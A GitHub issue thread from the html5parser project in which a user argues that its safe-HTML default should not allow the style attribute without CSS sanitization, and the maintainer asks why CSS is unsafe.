html5parser icon indicating copy to clipboard operation
html5parser copied to clipboard

Published 20 hours ago verified publisher icon acrazing

allowing style attribute is not safe

Open espretto opened this issue 2 years ago • 1 comments

CSS can be harmful and must be sanitized w/ e.g. cssfilter. It is not a safe default setting to allow the style attribute.

https://github.com/acrazing/html5parser/blob/cc95ffc4b50d99e64a477eb34934113f2d0ca3c4/src/safeHtml.ts#L95

espretto avatar Jul 29 '22 15:07 espretto

Can you specifically explain why css is not safe? It means that it will lead to disordered page styles?

acrazing avatar Jul 11 '23 09:07 acrazing